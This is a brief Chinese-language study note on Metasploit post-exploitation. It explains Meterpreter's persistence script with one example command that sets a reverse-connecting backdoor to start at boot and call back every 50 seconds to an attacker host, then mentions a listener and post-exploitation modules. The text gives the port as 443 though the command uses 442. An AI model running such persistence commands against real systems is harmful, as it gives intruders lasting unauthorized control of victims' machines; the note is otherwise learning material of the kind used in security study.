Metasploit 读书笔记-持久控制
Meterpreter的persisitence脚本允许主任meterpreter代理,以确保系统重启之后Meterpreter还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间按绑定开放端口。
举例:run persistence -X -i 50 -p 442 -r 192.168.33.129
此脚本让系统开机自启动(-X),50秒(-i 50)重连一次,使用的端口是443(-p 443),连接的目的IP为192.168.33.129.
use multi/handler命令进行监听。
9.向后渗透攻击模块转变
列出所有后渗透攻击模块,可以这样输入然后在末尾按TAB键:
run post/
10.将命令行shell升级为Meterpreter